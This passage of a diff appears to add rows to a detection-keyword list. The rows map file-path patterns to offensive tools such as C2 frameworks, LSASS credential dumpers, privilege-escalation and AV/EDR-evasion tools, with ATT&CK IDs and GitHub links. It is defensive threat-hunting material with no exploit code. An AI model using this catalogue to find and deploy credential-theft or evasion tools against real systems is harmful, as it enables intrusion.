+"*/postLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/PowerBruteLogon*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
+"*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
+"*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
+"*/powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/powerglot/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/powerloader.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/Powermad.git*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*/power-pwn.git*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
+"*/PowerSCCM.git*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
+"*/PowerSharpPack.git*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*/powershell/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*/powershell_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
+"*/PowershellKerberos.git*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
+"*/PowerShx.git*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
+"*/PowerTools*","offensive_tool_keyword","empire","Empire power tools like powerview powerbreach powerpick powerup","T1003 - T1078 - T1059 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Information Gathering","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","1932","825","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z"
+"*/PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*/PowerView.ps1*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z"
+"*/PowerView3.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
+"*/PPEnum/*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z"
+"*/ppl/ppl.c*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*/ppl_dump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*/PPLBlade.git*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"*/ppldump.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*/PPLDump_BOF/*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*/PPLFault/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/PPLKiller.git*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*/PPLKiller/*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*/pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*/PrimusC2*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*/PrimusC2.git*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*/printerbug.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation 
Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/PrintMonitorDll.*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/PrintMonitorDll/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/PrintSpoofer.git*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*/PrintSpoofer.git*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*/PrintSpoofer/*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*/Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/privesc/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*/PrivExchange*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*/PrivExchange.git*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin 
privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*/PrivFu.git*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*/PrivilegeEscalation/*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/Privileger.git*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*/PrivKit.git*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*/PrivKit/*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*/proberbyte.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
